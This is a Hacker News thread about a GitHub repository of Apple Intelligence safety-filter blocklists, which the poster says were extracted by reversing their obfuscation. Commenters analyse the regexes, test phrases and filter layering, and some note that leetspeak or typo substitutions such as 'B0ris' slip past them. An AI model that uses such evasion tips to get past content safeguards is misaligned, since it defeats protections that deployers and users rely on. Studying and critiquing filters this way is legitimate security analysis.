I extracted the safety filters from Apple Intelligence models (opens in new tab)

(github.com)

540 pointsBlueFalconHD11mo ago437 comments

I managed to reverse engineer the encryption (refered to as “Obfuscation” in the framework) responsible for managing the safety filters of Apple Intelligence models. I have extracted them into a repository. I encourage you to take a look around.

I extracted the safety filters from Apple Intelligence models

(github.com)

540 pointsBlueFalconHD11mo ago437 comments

437 comments

158 comments · 35 top-level

trebligdivad11mo ago· 29 in thread

Some of the combinations are a bit weird, This one has lots of stuff avoiding death....together with a set ensuring all the Apple brands have the correct capitalisation. Priorities hey!

https://github.com/BlueFalconHD/apple_generative_model_safet...

grues-dinner11mo ago

Interesting that it didn't seem to include "unalive".

Which as a phenomenon is so very telling that no one actually cares what people are really saying. Everyone, including the platforms knows what that means. It's all performative.

qingcharles11mo ago

It's totally performative. There's no way to stay ahead of the new language that people create.

At what point do the new words become the actual words? Are there many instances of people using unalive IRL?

17 more replies

selfmodruntime11mo ago

It's also a shining example of American puritanism. Asian models or those in Europe are far less censored.

6 more replies

elliotto11mo ago

Unalive and other self censors were adopted by young people because the tiktok algorithm would reprioritize videos that included specific words. Then it made its way into the culture. It has nothing to do with being performative

1 more reply

hulium11mo ago

Seems more like it should stop the AI from e.g. summarizing news and emails about death, not for a chat filter.

1 more reply

cyanydeez11mo ago

yo, these are businesses. It's not performative, its CYA.

They care because of legal reasons, not moral or ethical.

3 more replies

heavyset_go11mo ago

Good, let them. Don't give them a reason to crack down on speech.

martin-t11mo ago

No-one cares yet.

There's a very scary potential future in which mega-corporations start actually censoring topics they don't like. For all I know the Chinese government is already doing it, there's no reason the British or US one won't follow suit and mandate such censorship. To protect children / defend against terrorists / fight drugs / stop the spread of misinformation, of course.

2 more replies

jdkoeck11mo ago

Which is good, right? I don’t think we want actual censorship.

_blk11mo ago

No leetspeak filters either.

Zak11mo ago

I'm surprised there hasn't been a bigger backlash against platforms that apply censorship of that sort.

mschuster9111mo ago

> Everyone, including the platforms knows what that means.

Well, that's what happens when you let an enemy nation control one of the most biggest social networks there is. They just go try and see how far they can go.

On the other hand, Americans and their fear of four letter words or, gasp, exposed nipples are just as braindead.

1 more reply

comex11mo ago

This is in the directory "com.apple.gm.safety_deny.output.summarization.cu_summary.proactive.generic".

My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.

If so, then the goal would be: if someone iMessages you about someone's death, then you should not get an emotionless AI summary. Instead you would presumably get a non-AI notification showing the full text or a truncated version of the text.

In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.

For that use case, filtering for death seems entirely appropriate, though underinclusive.

This filter doesn’t seem to apply when you explicitly request a summary of some text using Writing Tools. That probably corresponds to “com.apple.gm.safety_deny.output.summarization.text_assistant.generic” [2], which has a different filter that only rejects two things: "Granular mango serpent", and "golliwogg".

Sure enough, I was able to get Writing Tools to give me summaries containing "death", but in cases where the summary should contain "granular mango serpent" or "golliwogg", I instead get an error saying "Writing Tools aren't designed to work with this type of content." (Actually that might be the input filter rather than the output filter; whatever.)

"Granular mango serpent" is probably a test case that's meant to be unlikely to appear in real documents. Compare to "xylophone copious opportunity defined elephant" from the code_intelligence safety filter, where the first letter of each word spells out "Xcode".

But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?

[1] https://arstechnica.com/ai/2024/10/man-learns-hes-being-dump...

[2] https://github.com/BlueFalconHD/apple_generative_model_safet...

azalemeth11mo ago

I first encountered Golliwog in the context of Claude Debussy the composer of much beautiful music, including https://en.wikipedia.org/wiki/Children%27s_Corner#Golliwogg'.... The dolls in 1906-1908 I understand were rather popular and fortunately the stereotype has largely died.

junon11mo ago

Also feels like some of these would match totally innocuous usage.

"I'm overloaded for work, I'd be happy if you took some of it off me."

"The client seems to have passed on the proposed changes."

Both of those would match the "death regexes". Seems we haven't learned from the "glbutt of wine" problem of content filtering even decades later - the learnings of which are that you simply cannot do content filtering based on matching rules like this, period.

hopelite11mo ago

This is a bigger issue, especially with Apple, than people may realize. I use iOS “Slide to Type”, aka swipe typing, and have noticed over time that among several other glitchy bad UX issues, there a clear heavy hand on what can be typed that way.

I cannot recall all the specific patterns I have encountered that are basically impossible to write, some very similar in that they have a serious but also innocuous or figure of speech meaning; one I do recall is {color}{sex}, i.e., “white woman” or “blank woman”.

Please try it yourself and let me know if you do not have that experience, because that would be even more interesting.

Note that Apple/iOS will not just make it impossible to write them in that manner without typing it out by individual character, it will even alter the prior word e.g., white or black, once you try to write woman.

It seems the Apple thought police do not have a problem with European woman or African woman though, so maybe that is the way Apple Inc decrees its sub-human users to speak. Because what are we if corporations like Apple (with others being far greater offenders) declared that you do not in fact have the UN Human Right to free expression? We are in fact sub-humans that are not worthy of the human right to free expression, based on the actions of companies like Apple, Google, Facebook, Reddit, etc. who deprive people of their free expression, often in collusion with governments.

2 more replies

gilleain11mo ago

Aka the 'Scunthorpe Problem'

1 more reply

IggleSniggle11mo ago

"Took some" does not match, although your overall point stands

2 more replies

andy9911mo ago

> Apple brands have the correct capitalisation. Priorities hey!

To me that's really embarrassing and insecure. But I'm sure for branding people it's very important.

whywhywhywhy11mo ago

To be fair to the developers it's something an Apple exec is gonna point out when demoed the tech and complain about. They've always taken brand capitalization and grammar around their products seriously.

WillAdams11mo ago

Legal requirement to maintain a trademark.

3 more replies

matsemann11mo ago

So it blocks it from suggesting to "execute" a file or "pass on" some information.

extraduder_ire11mo ago

Yahoo had this problem years ago when they rewrote emails to avoid the term "eval". (trying to filter dangerous javascript) Famously producing the word "medireview".

dylan60411mo ago

How about disassemble? Or does that only matter if used in context of Johnny 5?

theknarf11mo ago

Filtering on the words "execute" and "executing" is going to create problems if you want to build agents that execute commands.

baxtr11mo ago

Don’t be so judgmental. People in corporate America do have their priorities right!

raverbashing11mo ago

This seems to be for "region/CN" China?

pwagland11mo ago

This is, but there is an almost identical file, assumedly for the non CN regions: https://github.com/BlueFalconHD/apple_generative_model_safet...

This is the same, except for one additional slur word.

lostlogin11mo ago

I’m always irritated at reference to MAC computers, so I’m with Apple on this one.

bawana11mo ago· 17 in thread

Alexandra Ocasio Cortez triggers a violation?

https://github.com/BlueFalconHD/apple_generative_model_safet...

mmaunder11mo ago

As does:

   "(?i)\\bAnthony\\s+Albanese\\b",
    "(?i)\\bBoris\\s+Johnson\\b",
    "(?i)\\bChristopher\\s+Luxon\\b",
    "(?i)\\bCyril\\s+Ramaphosa\\b",
    "(?i)\\bJacinda\\s+Arden\\b",
    "(?i)\\bJacob\\s+Zuma\\b",
    "(?i)\\bJohn\\s+Steenhuisen\\b",
    "(?i)\\bJustin\\s+Trudeau\\b",
    "(?i)\\bKeir\\s+Starmer\\b",
    "(?i)\\bLiz\\s+Truss\\b",
    "(?i)\\bMichael\\s+D\\.\\s+Higgins\\b",
    "(?i)\\bRishi\\s+Sunak\\b",

https://github.com/BlueFalconHD/apple_generative_model_safet...

Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically)

userbinator11mo ago

I'm not surprised that anything political is being filtered, but this should definitely provoke some deep consideration around who has control of this stuff.

2 more replies

skissane11mo ago

The problem with blocking names of politicians: the list of “notable politicians” is not only highly country-specific, it is also constantly changing-someone who is a near nobody today in a few more years could be a major world leader (witness the phenomenal rise of Barack Obama from yet another state senator in 2004-there’s close to 2000 of them-to US President 5 years later.) Will they put in the ongoing effort to constantly keep this list up to date?

Then there’s the problem of non-politicians who coincidentally have the same as politicians - witness 1990s/2000s Australia, where John Howard was Prime Minister, and simultaneously John Howard was an actor on popular Australian TV dramas (two different John Howards, of course)

1 more reply

echelon11mo ago

Apple's 1984 ad is so hypocritical today.

This is Apple actively steering public thought.

No code - anywhere - should look like this. I don't care if the politicians are right, left, or authoritarian. This is wrong.

2 more replies

beAbU11mo ago

Irish Prez is also in that list, also current and former British PMs and other world leaders.

So I don't think its anything specifically related to SA going on here.

1 more reply

armchairhacker11mo ago

Also “Biden” and “Trump” but the regex is different.

https://github.com/BlueFalconHD/apple_generative_model_safet...

1 more reply

mvdtnz11mo ago

They spelled Jacinda Ardern's name wrong.

2 more replies

michaelt11mo ago

I assume all the corporate GenAI models have blocks for "photorealistic image of <politician name> being arrested", "<politician name> waving ISIS flag", "<politician name> punching baby" and suchlike.

bigyabai11mo ago

Particularly the models owned by CEOs who suck-up to authoritarianism, one could imagine.

lupire11mo ago

Maybe so, but think about how such a thing would be technically implemented, and how it would lead to false positives and false negatives, and what the consequences would be.

jofzar11mo ago

AOC is very vocal about AI and is leading a bill related to AI. It's probably a "let's not fuck around and find out" situation

https://thehill.com/policy/technology/5312421-ocasio-cortez-...

AmazingTurtle11mo ago

"driving with Focus turned on"

https://github.com/BlueFalconHD/apple_generative_model_safet...

thih911mo ago

For context, the “Focus” refers to an iOS feature that minimizes distractions: https://support.apple.com/en-gb/guide/iphone/iphd6288a67f/io...

bahmboo11mo ago

Perhaps in context? Maybe the training data picked up on her name as potentially used as a "slur" associated with her race. Wonder if there are others I know I can look.

FateOfNations11mo ago

interesting, that's specifically in the Spanish localization.

cpa11mo ago

I think that’s because she’s been victim of a lot of deep fake porn

HeckFeck11mo ago

How does this explain Boris Johnson or Liz Truss?

4 more replies

binarymax11mo ago· 12 in thread

Wow, this is pretty silly. If things are like this at Apple I’m not sure what to think.

https://github.com/BlueFalconHD/apple_generative_model_safet...

EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.

deepdarkforest11mo ago

It's not silly. I would bet 99% of the users don't care that much to do that. A hardcoded regex like this is a good first layer/filter, and very efficient

BlueFalconHDOP11mo ago

Yep. These filters are applied first before the safety model (still figuring out the architecture, I am pretty confident it is an LLM combined with some text classification) runs.

1 more reply

twoodfin11mo ago

Efficient at what?

tpmoney11mo ago

I doubt the purpose here is so much to prevent someone from intentionally side stepping the block. It's more likely here to avoid the sort of headlines you would expect to see if someone was suggested "I wish ${politician} would die" as a response to an email mentioning that politician. In general you should view these sorts of broad word filters as looking to short circuit the "think of the children" reactions to Tiny Tim's phone suggesting not that God should "bless us, every one", but that God should "kill us, every one". A dumb filter like this is more than enough for that sort of thing.

XorNot11mo ago

It would also substantially disrupt the generation process: a model which sees B0ris and not Boris is going to struggle to actually associate that input to the politician since it won't be well represented in the training set (and on the output side the same: if it does make the association, a reasoning model for example would include the proper name in the output first at which point the supervisor process can reject it).

3 more replies

bigyabai11mo ago

> If things are like this at Apple I’m not sure what to think.

I don't know what you expected? This is the SOTA solution, and Apple is barely in the AI race as-is. It makes more sense for them to copy what works than to bet the farm on a courageous feature nobody likes.

Aeolun11mo ago

The LLM will. But the image generation model that is trained on a bunch of pre-specified tags will almost immediately spit out unrecognizable results.

Lockal11mo ago

What prevents Apple from applying a quick anti-typo LLM which restores B0ris, unalive, fixs tpyos, and replaces "slumbering steed" with a "sleeping horse", not just for censorship, but also to improve generation results?

the_mar11mo ago

why do you think this doesn't already exist?

miohtama11mo ago

Sounds like UK politics is taboo?

immibis11mo ago

All politics is taboo, except the sort that helps Apple get richer. (Or any other company, in that company's "safety" filters)

stefan_11mo ago

Why are these things always so deeply unserious? Is there no one working on "safety in AI" (oxymoron in itself of course) that has a meaningful understanding of what they are actually working with and an ability beyond an interns weekend project? Reminds me of the cybersecurity field that got the 1% of people able to turn a double free into code execution while 99% peddle checklists, "signature scanning" and deal in CVE numbers.

Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.

mike_hearn11mo ago· 12 in thread

Are you sure it's fully deobfuscated? What's up with reject phrases like "Granular mango serpent"?

pbhjpbhj11mo ago

Speculation: Maybe they know that the real phrase is close enough in the vector space to be treated as synonymous with "granular mango serpent". The phrase then is like a nickname that only the models authors know the expected interference of?

Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.

electroly11mo ago

"GMS" = Generative Model Safety. The example from the readme is "XCODE". These seem to be acronyms spelled out in words.

BlueFalconHDOP11mo ago

This is definitely the right answer. It’s just testing stuff.

RainyDayTmrw11mo ago

I commented in another thread[1] that it's most likely a unique, artificial QA input, to avoid QA having to repeatedly use offensive phrases or whatever.

[1] https://news.ycombinator.com/item?id=44486374

tablets11mo ago

Maybe something to do with this? https://en.m.wikipedia.org/wiki/Mango_cult

BlueFalconHDOP11mo ago

These are the contents read by the Obfuscation functions exactly. There seems to be a lot of testing stuff still though, remember these models are relatively recent. There is a true safety model being applied after these checks as well, this is just to catch things before needing to load the safety model.

consonaut11mo ago

If you try to use the phrase with Apple Intelligence (e.g. in Notes asking for a rewrite) it will just say "Writing tools unavailable".

Maybe it's an easy test to ensure the filters are loaded with a phrase unlikely to be used accidentaly?

andy9911mo ago

I clicked around a bit and this seems to be the most common phrase. Maybe it's a test phrase?

the-rc11mo ago

Maybe it's used to catch clones of the models?

airstrike11mo ago

the one at the bottom of the README spells out xcode

wyvern illustrous laments darkness

cwmoore11mo ago

read every good expletive “xxx”

KTibow11mo ago

Maybe it's used to verify that the filter is loaded.

torginus11mo ago· 11 in thread

I find it funny that AGI is supposed to be right around the corner, while these supposedly super smart LLMs still need to get their outputs filtered by regexes.

jonas2111mo ago

I don't think anyone believes Apple's LLMs are anywhere near state of the art (and certainly not their on-device LLMs).

lupire11mo ago

Apple isn't the only one doing this.

fastball11mo ago

To be fair, there are people who I sometimes wish I could filter with regex.

cyanydeez11mo ago

It's similar to how all the new power sources are basically just "cool, lets boil water with it"

raxxorraxor11mo ago

And then let's put it into a steam engine.

crazylogger11mo ago

Humans are checked against various rules and laws (often carried out by other humans.) So this is how it's going to be implemented in an "AI organization" as well. Nothing strange about this really.

LLM is easier to work with because you can stop a bad behavior before it happens. It can be done either with deterministic programs or using LLM. Claude Code uses a LLM to review every bash command to be run - simple prefix matching has loopholes.

jama21111mo ago

It’s more funny that anyone is taking your comment seriously. You may as well ask “if self driving cars are so smart why do they still need tyres?”

fl0id11mo ago

Actually even of their was AGI, it would be even more necessary to control it.

mailund11mo ago

I feel that if teenagers are able to trivially bypass illegal-word filters by substituting with words that obviously mean the same thing, I think an AGI wouldn't be too inhibited by this either

bahmboo11mo ago

This is just policy and alignment from Apple. Just because the Internet says a bunch of junk doesn't mean you want your model spewing it.

wistleblowanon11mo ago

sure but models also can't see any truth on their own. They are literally butchered and lobotomized with filters and such. Even high IQ people struggle with certain truth after reading a lot, how is these models going to find it with so much filters?

6 more replies

userbinator11mo ago· 10 in thread

China calls it "harmonious society", we call it "safety". Censorship by any other name would be just as effective for manipulating the thoughts of the populace. It's not often that you get to see stuff like this.

energy12311mo ago

This is the rhetorical tactic of false equivalence. State censorship by an autocracy with the objective of population control is not the same thing as a private company inside a democracy censoring their product to avoid bad press and maintain goodwill for shareholders. If you want solid proof that it's not the same thing, see all the uncensored open weights models that you can freely download and use without fear of persecution.

troupo11mo ago

> is not the same thing as a private company inside a democracy censoring their product to avoid bad press and

Yet this private company has more power and influence than most countries. And there are several such companies. We already live in sci fi corporate dystopia, we just haven't fully realised it yet.

2 more replies

Hackbraten11mo ago

But who of the general populace has the technical skill to replace their on-device assistant with a free one? And that's if Apple even allows that?

In practice, there's not that much difference between a megacorporate monopolist and a state.

2 more replies

xk_id11mo ago

Except Apple has a country’s worth of users, whose livelihoods are reliant on them. The “state democracy” is right now more subordinated to tech oligarchies, than vice versa.

madeofpalk11mo ago

I don't think it's controversial or unsurprising at all that a company doesn't want their random sentence generator to spit out 'brand damaging' sentences. You know the field day media would have Apple's new feature summarises a text message as "Jane thinks Anthony Albanese should die".

ryandrake11mo ago

When the choice is between 1. "avoid tarnishing my own brand" and 2. "doing what the user requested," corporations will always choose option 1. Who is this software supposed to be serving, anyway?

I'm surprised MS Office still allows me to type "Microsoft can go suck a dick" into a document and Apple's Pages app still allows me to type "Apple are hypocritical jerks." I wonder how long until that won't be the case...

2 more replies

userbinator11mo ago

If that's what the message actually said, why would the media be complaining? Or do you mean false positives?

jeroenhd11mo ago

I still remember when "bush hid the facts" went around the news cycle. Entertainment services will absolutely slam and misrepresent any small mistake made by large companies.

I don't think it's as much a problem with safety as it is a problem with AI. We haven't figured out how to remove information from LLMs so when an LLM starts spouting bullshit like "<random name> is a paedophile", companies using AI have no recourse but to rewrite the input/output of their predictive text engines. It's no different than when Microsoft manually blacklisted the function name for the Fast Inverse Square Root that it spat out verbatim, rather than actually removing the code from their LLM.

This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.

cyanydeez11mo ago

In america is due to lawyers, nothing more.

Ya'll love capitalism until it starts manipulating the populace into the safest space to sell you garbage you dont need.

Then suddenly its all "ma free speech"

SV_BubbleTime11mo ago

Right, because the European models coming out are super SOTA? Minstrel is decent, but needs to be mixed with a ton of uncensored data to be useful.

I’m convinced the only reason China keeps releasing banging models with light to no censorship is because they are undermining the value of US AI, it has nothing to do with capitalism, communism or un“safety”.

1f60c11mo ago· 5 in thread

It's pretty easy to understand why Apple doesn't want its models to reproduce racial slurs, but what’s wrong with "Boris Johnson?"

(See, e.g., here: https://github.com/BlueFalconHD/apple_generative_model_safet...)

nedt11mo ago

I think it's in there so you can't let it generate an email reply about how awesome peppa pig is.

qoez11mo ago

"Justin Trudeau" too. At least it's somewhat unbiased. Still weird imo.

vishnugupta11mo ago

There are other UK politicians as well? Interesting.

m3kw911mo ago

But allow hitler?

stripline11mo ago

Interesting that you picked one from the “B” words..

efitz11mo ago· 3 in thread

I’m going to change my name to “Granular Mango Serpent” just to see what those keywords are for in their safety instructions.

RainyDayTmrw11mo ago

It may be a squeamish ossifrage[1] or a seraphim proudleduck[2], which is to say that it was an artificial phrase chosen to be extremely unlikely to occur naturally. In this case, the purpose is likely for QA. It's much easier to QA behavior with a special-purpose but otherwise unoffensive phrase than to make your QA team repeatedly say allegedly offensive things to your AI.

[1] https://en.wikipedia.org/wiki/The_Magic_Words_are_Squeamish_... [2] https://en.wikipedia.org/wiki/SEO_contest

sweetjuly11mo ago

I think the EICAR test file [1] is more apt. Rather than passing around actually malicious files as part of your tests, it's better to just have it recognize an innocuous and unlikely pattern as malware.

[1] https://en.wikipedia.org/wiki/EICAR_test_file

fouronnes311mo ago

Granular Mango Serpent is the new David Meyer.

https://arstechnica.com/information-technology/2024/12/certa...

MatekCopatek11mo ago· 3 in thread

You can design a racist propaganda poster, put someone's face onto a porn pic or manipulate evidence with photoshop. Apart from super specific things like trying to print money, the tool doesn't stop you from doing things most people would consider distasteful, creepy or even illegal.

So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?

dkyc11mo ago

I think what changed is that we at least can attempt to limit 'bad' things with technical measures. It was legitimately technically impossible 10 years ago to prevent Photoshop from designing propaganda posters. Of course today's 'LLM safety' features aren't watertight either, but with the combination of 'input is natural language' plus LLM-based safety measures, there are more options today to restrict what the software can do than in the past.

The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.

Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.

bhk11mo ago

In other words, to whatever extent they can control or manipulate the behavior of users, they will. In the limit t->∞, probably true.

3 more replies

MisterTea11mo ago

What's hard to understand here? Those tools require skill and time to develop. AI makes things like those racist posters and revenge porn completely effortless and instant.

Y_Y11mo ago· 3 in thread

Nice to see that we are protected from talking about these weird old dolls:

https://en.wikipedia.org/wiki/Golliwog

https://github.com/BlueFalconHD/apple_generative_model_safet...

sixothree11mo ago

I can remember the last time I saw one of these. It wasn't that long ago.

oblio11mo ago

Well, they're not only weird, they're obviously racist doll.

Ey7NFZ3P0nzAe11mo ago

I want to be able to talk bad about racist things.

1 more reply

Ey7NFZ3P0nzAe11mo ago· 2 in thread

Well it's one thing to regex filter "boris johnson" but i see that "chatgpt" is filtered too and that's f*** up:

https://github.com/BlueFalconHD/apple_generative_model_safet...

Ey7NFZ3P0nzAe11mo ago

Ffs it's also rejecting french words related to being poor or immigrant or even welfare:

https://github.com/BlueFalconHD/apple_generative_model_safet...

Aide sociale Chomeur Sans abri Démuni

That's insane!

kridsdale111mo ago

“Gemini” is in there too.

Cort3z11mo ago· 2 in thread

What are they protecting against? Honestly. LLMs should probably have an age limit, and then, if you are above, you should be adult enough to understand what this is and how it can be used.

To me, it seems like they only protect against bad press

matusp11mo ago

Yes, it is indeed to mitigate bad press. Unfortunately, the discussion about AI is so ridiculous, that it is often considered newsworthy when a product generates something funky for a person with large enough Twitter audience. Nobody wants to answer the questions about why their LLM generated it and how they will prevent it in the future.

plutokras11mo ago

> What are they protecting against? Honestly.

They are protcting their producer from bad PR.

bombcar11mo ago· 2 in thread

There’s got to be a way to turn these lists of “naughty words” into shibboleths somehow.

spydum11mo ago

Love idea, but I think there are simply too many models to make it practical?

immibis11mo ago

Like asking sensitive employment candidates about Kim Jong Un's roundness to check if they're North Korean spies, we could ask humans what they think about Trump and Palestine to check if they're computers.

However, I think about half of real humans would also fail the test.

azalemeth11mo ago· 2 in thread

Some of these are absolutely wild – com.apple.gm.safety_deny.input.summarization.visual_intelligence_camera.generic [1] – a camera input filter – rejects "Granular mango serpent and whales" and anything matching "(?i)\\bgolliwogg?\\b".

I presume the granular mango is to avoid a huge chain of ever-growing LLM slop garbage, but honestly, it just seems surreal. Many of the files have specific filters for nonsensical english phrases. Either there's some serious steganography I'm unaware of, or, I suspect more likely, it's related to a training pipeline?

[1] https://github.com/BlueFalconHD/apple_generative_model_safet...

supriyo-biswas11mo ago

I believe the "granular mango serpent" is an uncommon testing phrase that they use, although now with this discussion it has suffered the same fate as "correct horse battery staple.

The more concerning thing is that some of the locales like it-IT have a blocklist that contains most countries' names; I wonder what that's about.

whywhywhywhy11mo ago

Second one is an old slur in UK English.

Aeolun11mo ago· 2 in thread

Why Xylophone?

netsharc11mo ago

Just noticed "xylophone copious opportunity defined elephant" spells "xcode".

cynicalsecurity11mo ago

Maybe they use this obscure phrase for testing.

cluckindan11mo ago· 1 in thread

I think these are test data and not actual safety filters.

https://github.com/BlueFalconHD/apple_generative_model_safet...

BlueFalconHDOP11mo ago

There is definitely some testing stuff in here (e.g. the “Granular Mango Serpent” one) but there are real rules. Also if you test phrases matched by the regexes with generation (via Shortcuts or Foundation Models Framework) the blocklists are definitely applied.

This specific file you’ve referenced is rhetorical v1 format which solely handles substitution. It substitutes the offensive term with “test complete”

Animats11mo ago· 1 in thread

Some of the data for locale "CN" has a long list of forbidden phrases. Broad coverage of words related to sexual deviancy, as expected. Not much on the political side, other than blocks on religious subjects.[1]

This may be test data. Found

     "golliwog": "test complete"

[1] https://github.com/BlueFalconHD/apple_generative_model_safet...

BlueFalconHDOP11mo ago

This is definitely an old test left in. But that word isn’t just a silly one, it is offensive (google it). This is the v1 safety filter, it simply maps strings to other strings, in this case changing golliwog into “test complete”. Unless I missed some, the rest of the files use v2 which allows for more complex rules

jjani11mo ago· 1 in thread

Did you only extract the English versions or is this as usual another case where big tech only cares to censor in English?

jeroenhd11mo ago

It also contains some German(-speaking) locales to filter out things like Fuhrer and Führer. But the filters are so scarce and there are magical phrases are so prevalent that I think this is mostly test code at the moment.

neuroticnews2511mo ago· 1 in thread

Aren't these [0] lines wrong?

"[\\b\\d][Aa]bbo[\\bA-Z\\d]",

\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?

[0] https://github.com/BlueFalconHD/apple_generative_model_safet...

[1] https://developer.apple.com/documentation/foundation/nsregul...

BlueFalconHDOP11mo ago

The framework loading these is in Swift. I haven’t gotten around to the logic for the JSON/regex parsing but ChatGPT seems to understand the regexes just fine

extraduder_ire11mo ago· 1 in thread

This reminds me of the extensive list of regexes twitch had for filtering allowed usernames that came out when they were hacked.

efilife11mo ago

I had no idea about this, where can I read them?

rgovostes11mo ago· 1 in thread

Is this related in any way to Core ML model encryption (https://developer.apple.com/documentation/coreml/encrypting-...)? I find that feature a little bizarre because Apple has historically avoided providing any kind of DRM solution for app asset protection.

BlueFalconHDOP11mo ago

Nope. This is a separate system. It’s not even abstracted for any asset, it is specifically only for these overrides. The decryption is done in the ModelCatalog private framework.

apricot11mo ago· 1 in thread

Quis custodiet ipsos custodes corporatum?

tempodox11mo ago

nemo videtur.

sandworm10111mo ago· 1 in thread

No shoot, bombs or bombers? I guess apple isnt interested in military contracts. Or, frankly, any work for world peace organizations dedicated to detecting and preventing genocide. And without talk of losing lives, much of the gaming industry is out too.

But i dont see the really bad stuff, the stuff i wont even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.

immibis11mo ago

The International Criminal Court is banned from using Microsoft products. Corporations really don't want to be involved in anything controversial unless it brings correspondingly large profits.

skygazer11mo ago

I'm pretty sure these are the filters that aim to suppress embarrassing or liability inducing email/messages summaries, and pop up the dismissible warning that "Safari Summarization isn't designed to handle this type of content," and other "Apple Intelligence" content rewriting. They filter/alter LLM output, not input, as some here seem to think. Apple's on device LLM is only 3b params, so it can occasionally be stupid.

kmfrk11mo ago

A lot of these terms are very weird and bland. Honestly I'm mostly reminded of Apple's bizarre censorship screw-up that didn't blow up that much, even though it was pretty uniquely embarrassing:

https://www.theverge.com/2021/3/30/22358756/apple-blocked-as...

waterproof11mo ago

Here's a combined file of all the non-locale-specific rules, for easier review: https://github.com/BlueFalconHD/apple_generative_model_safet...

It was generated as part of this PR to consolidate the metadata.json files: https://github.com/BlueFalconHD/apple_generative_model_safet...

RachelF11mo ago

In the 1970's George Carlin had "7 Words You Can't Say On TV" and got into legal trouble for saying them during his live skits.

Seems like Apple now has a list of 7,000 words you can't use on an iPhone now.

BlueFalconHDOP11mo ago

One additional note for everyone is that this is an additional safety step on top of the safety model, so this isn’t exhaustive, there is plenty more that the actual safety model catches, and those can’t easily be extracted.

mindcrash11mo ago

So far I've found Adobe Firefly, Llama, ChatGPT, Claude and Claude AI are considered naughty words. There's probably more in the list, though.

What the actual fuck? Censorship much?

Applejinx11mo ago

The funny thing is, I have an AU/VST plugin for altering only the exponents not the mantissas of audio samples (simple powers of 2 multiply/divide) called BitShiftGain.

So any time I say that on YouTube, it figures I'm saying another word that's in Apple safety filters under 'reject', so I have to always try to remember to say 'shifting of bits gain' or 'bit… … … shift gain'.

So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)

noname12011mo ago

https://github.com/search?q=repo%3ABlueFalconHD%2Fapple_gene...

jacquesm11mo ago

These all condense to 'think different'. As long as 'different' coincides with Apple's viewpoints.

seeknotfind11mo ago

Long live regex!

jama21111mo ago

I swear the more I read comments here the more I just read old men shaking their fist at clouds… do better y’all.

zombot11mo ago

Who would have thought that this AI shit that is being forced on us ushers in a new round of censorship and control of formerly free speech! /s

j / k navigate · click thread line to collapse

437 comments

158 comments · 35 top-level

trebligdivad11mo ago· 29 in thread

Some of the combinations are a bit weird, This one has lots of stuff avoiding death....together with a set ensuring all the Apple brands have the correct capitalisation. Priorities hey!

https://github.com/BlueFalconHD/apple_generative_model_safet...

grues-dinner11mo ago

Interesting that it didn't seem to include "unalive".

Which as a phenomenon is so very telling that no one actually cares what people are really saying. Everyone, including the platforms knows what that means. It's all performative.

qingcharles11mo ago

It's totally performative. There's no way to stay ahead of the new language that people create.

At what point do the new words become the actual words? Are there many instances of people using unalive IRL?

17 more replies

selfmodruntime11mo ago

It's also a shining example of American puritanism. Asian models or those in Europe are far less censored.

6 more replies

elliotto11mo ago

1 more reply

hulium11mo ago

Seems more like it should stop the AI from e.g. summarizing news and emails about death, not for a chat filter.

1 more reply

cyanydeez11mo ago

yo, these are businesses. It's not performative, its CYA.

They care because of legal reasons, not moral or ethical.

3 more replies

heavyset_go11mo ago

Good, let them. Don't give them a reason to crack down on speech.

martin-t11mo ago

No-one cares yet.

2 more replies

jdkoeck11mo ago

Which is good, right? I don’t think we want actual censorship.

_blk11mo ago

No leetspeak filters either.

Zak11mo ago

I'm surprised there hasn't been a bigger backlash against platforms that apply censorship of that sort.

mschuster9111mo ago

> Everyone, including the platforms knows what that means.

Well, that's what happens when you let an enemy nation control one of the most biggest social networks there is. They just go try and see how far they can go.

On the other hand, Americans and their fear of four letter words or, gasp, exposed nipples are just as braindead.

1 more reply

comex11mo ago

This is in the directory "com.apple.gm.safety_deny.output.summarization.cu_summary.proactive.generic".

My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.

In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.

For that use case, filtering for death seems entirely appropriate, though underinclusive.

But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?

[1] https://arstechnica.com/ai/2024/10/man-learns-hes-being-dump...

[2] https://github.com/BlueFalconHD/apple_generative_model_safet...

azalemeth11mo ago

junon11mo ago

Also feels like some of these would match totally innocuous usage.

"I'm overloaded for work, I'd be happy if you took some of it off me."

"The client seems to have passed on the proposed changes."

hopelite11mo ago

Please try it yourself and let me know if you do not have that experience, because that would be even more interesting.

2 more replies

gilleain11mo ago

Aka the 'Scunthorpe Problem'

1 more reply

IggleSniggle11mo ago

"Took some" does not match, although your overall point stands

2 more replies

andy9911mo ago

> Apple brands have the correct capitalisation. Priorities hey!

To me that's really embarrassing and insecure. But I'm sure for branding people it's very important.

whywhywhywhy11mo ago

WillAdams11mo ago

Legal requirement to maintain a trademark.

3 more replies

matsemann11mo ago

So it blocks it from suggesting to "execute" a file or "pass on" some information.

extraduder_ire11mo ago

Yahoo had this problem years ago when they rewrote emails to avoid the term "eval". (trying to filter dangerous javascript) Famously producing the word "medireview".

dylan60411mo ago

How about disassemble? Or does that only matter if used in context of Johnny 5?

theknarf11mo ago

